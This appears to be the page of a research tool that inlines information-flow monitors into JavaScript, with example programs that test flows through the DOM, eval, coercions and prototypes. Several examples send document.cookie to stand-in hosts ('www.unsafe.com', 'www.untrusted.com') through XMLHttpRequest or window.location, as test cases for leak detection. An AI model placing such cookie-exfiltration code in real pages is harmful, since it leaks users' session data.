Information Flow Monitor Inlining for JavaScript and Web APIs

Article: Modular Monitor Extensions for Information Flow Security in JavaScript
The full version can be found in Chapter 6 and Appendix C of Fragoso Santos's PhD thesis
Proofs: Modular Monitor Extensions for Information Flow Security in JavaScript
IFlow Signatures for DOM APIs
Extra IFlow Signatures
Source Code
Instructions on how to use the tool

Input:



Support Coercions: Support APIs: Support Eval:

Output:




Exec IFrame

Specify the CSS StyleSheet to Use with your Example:


Examples:

// Example programs for the information-flow monitor inliner. Each example
// starts at its own `var` declaration and is meant to be pasted into the tool
// on its own; the same variable names are reused from one example to the next.
// upgVar / upgProp / upgStruct / upgTreeLevel / upgGlobalTagLevel are the
// tool's labelling calls; the level arguments ('2', '5') are passed as strings.
// NOTE(review): the ordering and meaning of the levels is not shown on this
// page; presumably a higher level is more confidential. Confirm against the
// tool's instructions.

// --- DOM tree structure: child count after a branch on a labelled value ---
// h is labelled '2'; the branch re-parents div2 from div1 to div3, so
// div1.childNodes.length (0 or 1) depends on h.
var div1, div2, div3, h, l;
h = 1;
upgVar(h, '2');
div1 = document.createElement('div');
div2 = document.createElement('div');
div3 = document.createElement('div');
div1.appendChild(div2);
if (h) {
  div3.appendChild(div2);
}
l = div1.childNodes.length;

// Same program with div1, div3 and div2 labelled before the branch.
var div1, div2, div3, h, l;
h = 1;
upgVar(h, '2');
div1 = document.createElement('div');
div2 = document.createElement('div');
div3 = document.createElement('div');
div1.appendChild(div2);
upgStruct(div1, '2');
upgStruct(div3, '2');
div2.upgTreeLevel('2');
if (h) {
  div3.appendChild(div2);
}
l = div1.childNodes.length;

// Same labelled program, but the branch-dependent count is passed to alert().
var div1, div2, div3, h, l;
h = 1;
upgVar(h, '2');
div1 = document.createElement('div');
div2 = document.createElement('div');
div3 = document.createElement('div');
div1.appendChild(div2);
upgStruct(div1, '2');
upgStruct(div3, '2');
div2.upgTreeLevel('2');
if (h) {
  div3.appendChild(div2);
}
l = div1.childNodes.length;
alert(l);

// --- DOM tree structure: which node is the first child ---
// div2 starts under div3; the branch moves it under div1 before div3 is
// appended, so div1.childNodes[0] is div2 or div3 depending on h.
var div1, div2, div3, h, l;
h = 1;
upgVar(h, '2');
div1 = document.createElement("div");
div2 = document.createElement("div");
div3 = document.createElement("div");
div3.appendChild(div2);
if (h) {
  div1.appendChild(div2);
}
div1.appendChild(div3);
l = div1.childNodes[0];

// Removal variant: the branch removes div2, so childNodes[0] is div2 or
// undefined depending on h. div3 is declared but unused here.
var div1, div2, div3, h, l;
h = 1;
upgVar(h, '2');
div1 = document.createElement("div");
div2 = document.createElement("div");
div1.appendChild(div2);
if (h) {
  div1.removeChild(div2);
}
l = div1.childNodes[0];

// Interactive, unlabelled version: h comes from confirm() and the resulting
// child count is shown with alert().
var div1, div2, h, l;
h = confirm("Do you want to execute the if-then branch?");
div1 = document.createElement("DIV");
div2 = document.createElement("DIV");
div1.appendChild(div2);
if (h) {
  div1.removeChild(div2);
}
l = div1.childNodes.length;
alert(l);

// Same removal program with div1 and div2 labelled '5' before the branch and
// without the alert().
var div1, div2, h, l;
h = confirm('Do you want to execute the if-then branch?');
div1 = document.createElement('DIV');
div2 = document.createElement('DIV');
div1.appendChild(div2);
upgStruct(div1, '5');
div2.upgTreeLevel('5');
if (h) {
  div1.removeChild(div2);
}
l = div1.childNodes.length;

// Interactive, unlabelled first-child variant; the node read from
// childNodes[0] is passed to alert().
var div1, div2, div3, h, l;
h = confirm("Do you want to execute the if-then branch?");
div1 = document.createElement("DIV");
div2 = document.createElement("DIV");
div3 = document.createElement("DIV");
div3.appendChild(div2);
if (h) {
  div1.appendChild(div2);
}
div1.appendChild(div3);
l = div1.childNodes[0];
alert(l);

// Same first-child program with div1, div3 and div2 labelled '5' and without
// the alert().
var div1, div2, div3, h, l;
h = confirm('Do you want to execute the if-then branch?');
div1 = document.createElement('DIV');
div2 = document.createElement('DIV');
div3 = document.createElement('DIV');
div3.appendChild(div2);
upgStruct(div1, '5');
upgStruct(div3, '5');
div2.upgTreeLevel('5');
if (h) {
  div1.appendChild(div2);
}
div1.appendChild(div3);
l = div1.childNodes[0];

// --- Live collections (getElementsByTagName) ---
// divs is obtained before the branch; the branch re-parents div1 under div2,
// which changes the document order seen through divs afterwards.
var div1, div2, div3, divs, h, l;
h = 1;
upgVar(h, '2');
div1 = document.createElement("DIV");
div2 = document.createElement("DIV");
div3 = document.createElement("DIV");
div2.appendChild(div3);
document.body.appendChild(div1);
document.body.appendChild(div2);
divs = document.getElementsByTagName("DIV");
if (h) {
  div2.appendChild(div1);
}
l = divs[0];

// Same program with div1, div2 and document.body labelled '2'; note that it
// reads divs[1] where the previous example reads divs[0].
var div1, div2, div3, divs, h, l;
h = 1;
upgVar(h, '2');
div1 = document.createElement("DIV");
div2 = document.createElement("DIV");
div3 = document.createElement("DIV");
div2.appendChild(div3);
document.body.appendChild(div1);
document.body.appendChild(div2);
divs = document.getElementsByTagName("DIV");
upgStruct(div1, '2');
upgStruct(div2, '2');
upgStruct(document.body, '2');
div2.upgTreeLevel('2');
div1.upgTreeLevel('2');
if (h) {
  div2.appendChild(div1);
}
l = divs[1];

// Interactive, unlabelled: the branch adds a DIV to the document, so
// divs.length depends on the confirm() answer and is shown with alert().
var div, divs, h, l;
h = confirm("Do you want to execute the if-then branch?");
divs = document.getElementsByTagName("DIV");
if (h) {
  div = document.createElement("DIV");
  document.body.appendChild(div);
}
l = divs.length;
alert(l);

// Same program with document.body, the 'DIV' tag and the variable div labelled
// '5' before the branch, and without the alert().
// NOTE(review): upgGlobalTagLevel presumably labels the set of all elements
// with that tag name; confirm against the IFlow signatures for DOM APIs.
var body, div, divs, h, l;
h = confirm('Do you want to execute the if-then branch?');
body = document.body;
divs = document.getElementsByTagName('DIV');
upgStruct(body, '5');
upgGlobalTagLevel('DIV', '5');
upgVar(div, '5');
if (h) {
  div = document.createElement('DIV');
  document.body.appendChild(div);
}
l = divs.length;

// Interactive, unlabelled: the branch inserts div3 under div1, which sits
// before div2 in the document, so the node at divs[1] depends on the answer.
var div1, div2, div3, divs, h, l;
h = confirm("Do you want to execute the if-then branch?");
div1 = document.createElement("DIV");
div2 = document.createElement("DIV");
document.body.appendChild(div1);
document.body.appendChild(div2);
divs = document.getElementsByTagName("DIV");
if (h) {
  div3 = document.createElement("DIV");
  div1.appendChild(div3);
}
l = divs[1];

// Same program with body, div1, the 'DIV' tag, the variable div3 and div2
// labelled '5' before the branch.
var div1, div2, div3, divs, h, l, body;
body = document.body;
h = confirm('Do you want to execute the if-then branch?');
div1 = document.createElement('DIV');
div2 = document.createElement('DIV');
body.appendChild(div1);
body.appendChild(div2);
divs = document.getElementsByTagName('DIV');
upgStruct(body, '5');
upgStruct(div1, '5');
upgGlobalTagLevel('DIV', '5');
upgVar(div3, '5');
div2.upgTreeLevel('5');
if (h) {
  div3 = document.createElement('DIV');
  div1.appendChild(div3);
}
l = divs[1];

// --- Core language: variables and properties ---
// Explicit flow: y is computed from the labelled x.
var x, y;
x = 4;
upgVar(x, '2');
y = x + 4;

// Implicit flow: the unlabelled x is assigned inside a branch on the labelled y.
var x, y;
y = 3;
upgVar(y, '2');
if (y) {
  x = 2;
}

// Property write inside a branch on y, with property 'p' labelled '2' first.
var x, y, z;
y = 3;
upgVar(y, '2');
z = {};
z['p'] = null;
upgProp(z, 'p', '2');
if (y) {
  z['p'] = 2;
}

// Same write without labelling 'p'.
var x, y, z;
y = 3;
upgVar(y, '2');
z = {};
z['p'] = null;
if (y) {
  z['p'] = 2;
}

// Property creation inside a branch on h: whether o has a property 'p' at all
// depends on h. o is not labelled.
var o, h;
o = {};
h = 3;
upgVar(h, '2');
if(h) {
  o['p'] = 2;
}

// Same creation with o labelled via upgStruct first.
var o, h;
o = {};
h = 3;
upgVar(h, '2');
upgStruct(o, '2');
if(h) {
  o['p'] = 2;
}

// --- eval ---
// Plain eval of an assignment; no labelling call.
var x;
eval('x = 3; x')

// eval executed inside a branch on the labelled y; the evaluated code assigns
// the unlabelled x.
var x, y;
x = 0;
y = 2;
upgVar(y, '2');
if (y) {
  eval('x = 3; x');
}

// --- Network sink: XMLHttpRequest ---
// The declaration below appears twice in the page text; kept as is.
// document.cookie is labelled '2' and its value is then handed to xhr.open().
// NOTE(review): url is assigned but never used; xhr.open() receives cookie as
// its URL argument. If the example is meant to exercise the concatenated
// request URL, the second argument was presumably meant to be url; confirm.
var xhr, cookie, url;
var xhr, cookie, url;
document.cookie = '';
upgProp(document, 'cookie', '2');
xhr = new XMLHttpRequest();
cookie = document.cookie;
url = 'www.unsafe.com?' + cookie;
xhr.open('POST', cookie);
xhr.send();

// Same request with no labelling call on document.cookie. The remark about
// the unused url applies here too.
var xhr, cookie, url;
xhr = new XMLHttpRequest();
cookie = document.cookie;
url = 'www.unsafe.com?' + cookie;
xhr.open('POST', cookie);
xhr.send();

// Labelled cookie again, with a different host string in url.
// NOTE(review): presumably meant to contrast an allowed destination with the
// 'www.unsafe.com' one, but url is not what xhr.open() is given; confirm.
var xhr, cookie, url;
document.cookie = 'hello';
upgProp(document, 'cookie', '2');
xhr = new XMLHttpRequest();
cookie = document.cookie;
url = 'www.safe.com?' + cookie;
xhr.open('POST', cookie);
xhr.send();

// --- Loop with computed property writes; no labelling call ---
// Writes o[10] .. o[1] and alerts n after each decrement.
var n, o;
n = 10;
o = {};
while(n) {
  o[n] = n;
  n = n - 1;
  alert(n);
}

// --- Coercion in a computed property access ---
// o2[o1] converts o1 to a property key through o1.toString(), which returns
// 'p', so public1 reads o2.p (the confirm() answer); the branch on public1
// then writes public2.
var o1, o2, public1, public2, secret, tmp;
o1 = {};
o2 = {};
secret = confirm('Do you have a secret?');
tmp = function () {
  return 'p';
};
o1.toString = tmp;
o2.p = secret;
public1 = o2[o1];
if (public1) {
  public2 = 3;
}

// Same flow with the toString() call written out and public2 labelled '5'
// before the branch.
var o1, o2, public1, public2, secret, f;
o1 = {};
o2 = {};
secret = confirm('Do you have a secret?');
f = function () {
  return 'p';
};
o1.toString = f;
o2.p = secret;
public1 = o2[o1.toString()];
upgVar(public2, '5');
if (public1) {
  public2 = 3;
}

// --- Shadowed hasOwnProperty ---
// o.hasOwnProperty is replaced by a function that always returns false before
// a property write inside a branch on the labelled h.
// NOTE(review): presumably checks that the inlined monitor does not depend on
// the object's own, replaceable hasOwnProperty when it looks up a property's
// label; confirm against the paper.
var o, f, h;
o = {};
o.p = 0;
upgStruct(o, '2');
f = function () {
  return false;
};
o.hasOwnProperty = f;
h = 1;
upgVar(h, '2');
if (h) {
  o.p = 1;
}

// Variant where o.p does not exist before the branch. The first declaration
// below is a leftover in the page text (f_aux is not used); kept as is.
var o, f_aux, h;
var o, f, h;
o = {};
upgStruct(o, '2');
f = function () {
  return false;
};
o.hasOwnProperty = f;
h = 1;
upgVar(h, '2');
if (h) {
  o.p = 1;
}

// Same variant written with bracket notation throughout.
var o, f_aux, h;
o = {};
upgStruct(o, '2');
f_aux = function () {
  return false;
};
o['hasOwnProperty'] = f_aux;
h = 1;
upgVar(h, '2');
if (h) {
  o['p'] = 1;
}

// --- Constructors and prototypes ---
// The constructor labels this.id as '2'; the labelled property is then read
// into low.
var Person, p1, low;
Person = function (id, name, age) {
  this.id = id;
  this.name = name;
  this.age = age;
  upgProp(this, 'id', '2');
};
p1 = new Person(1, 'Raquel', 22);
low = p1.id;

// Labelled id read into high, then low is assigned inside a branch on high.
// `high` is listed twice in the declaration; harmless with var.
var Person, p1, high, low, high;
Person = function (id, name, age) {
  this.id = id;
  this.name = name;
  this.age = age;
  upgProp(this, 'id', '2');
};
p1 = new Person(1, 'Raquel', 22);
high = p1.id;
if (high) {
  low = high + 4;
}

// The labelled property lives on Person.prototype and is reached through the
// prototype chain via p1.secret.
var Person, person_proto, low, high, p1;
Person = function (id, name, age) {
  this.id = id;
  this.name = name;
  this.age = age;
  upgProp(this, 'id', '2');
};
person_proto = Person.prototype;
person_proto.secret = 'secret';
upgProp(person_proto, 'secret', '2');
p1 = new Person(1, 'Raquel', 22);
high = p1.secret;
if (high) {
  low = high + ' other secret';
}

// A prototype method returns the labelled this.id; the result is stored in high.
var Person, person_proto, fun_say_id, new_person, high;
Person = function (name, id) {
  this.name = name;
  this.id = id;
  upgProp(this, 'id', '2');
};
person_proto = Person.prototype;
fun_say_id = function () {
  return this.id;
};
person_proto.sayYourId = fun_say_id;
new_person = new Person('raquel', 1);
high = new_person.sayYourId();

// Same, followed by an assignment to low inside a branch on the method's result.
var Person, person_proto, fun_say_id, new_person, high, low;
Person = function (name, id) {
  this.name = name;
  this.id = id;
  upgProp(this, 'id', '2');
};
person_proto = Person.prototype;
fun_say_id = function () {
  return this.id;
};
person_proto.sayYourId = fun_say_id;
new_person = new Person('raquel', 1);
high = new_person.sayYourId();
if (high) {
  low = high * 2;
}

// --- Aliasing ---
// x and y refer to the same object; the labelled h is written through y.f and
// read back through both y.f and x.f, each value being passed to alert().
var x, y, h, z1, z2;
h = 0;
upgVar(h, '2');
x = {};
x.f = 0;
y = x;
y.f = h;
z1 = y.f;
alert(z1);
z2 = x.f;
alert(z2);

// --- Navigation sink: window.location ---
// The labelled cookie value is concatenated into url, which is assigned to
// window.location.
var cookie, url;
document.cookie = '';
upgProp(document, 'cookie', '2');
cookie = document.cookie;
url = 'http://www.untrusted.com/' + cookie;
window.location = url;

// --- Implicit flow through ToPrimitive coercion ---
// No labelling call here. `o+1` calls o.valueOf() first; when h is truthy it
// returns an object, so the conversion falls back to o.toString(), which sets
// l = true. l therefore ends up depending on h.
// The two function expressions have no trailing semicolon, so this example
// relies on the line break after `}` for automatic semicolon insertion.
var h, l, o, aux;
h = 1;
l = false;
o = {};
aux = function(){
  var aux; // local aux shadows the outer variable inside this function
  if(h) {
    aux = {};
    return aux;
  } else {
    return 1;
  }
}
o['valueOf'] = aux;
aux = function(){
  l = true;
  return 5;
}
o['toString'] = aux;
o+1;

// --- for-in enumeration ---
// Property 'p' is labelled '2'; the loop concatenates every enumerated
// property name into l, which is then passed to alert().
var l, p, o;
o = {};
o.q = 'foo';
o.p = 'bar';
l = '';
upgProp(o, 'p', '2');
for (p in o) {
  l = l + p;
}
alert(l);

// Same loop without the alert().
var l, p, o;
o = {};
o.q = 'foo';
o.p = 'bar';
l = '';
upgProp(o, 'p', '2');
for (p in o) {
  l = l + p;
}

// The loop body reads the labelled o.p directly and passes it to alert() on
// each iteration.
var l, p, o, s;
o = {};
o.q = 'foo';
o.p = 'bar';
l = '';
upgProp(o, 'p', '2');
for (p in o) {
  s = o.p;
  alert(s);
}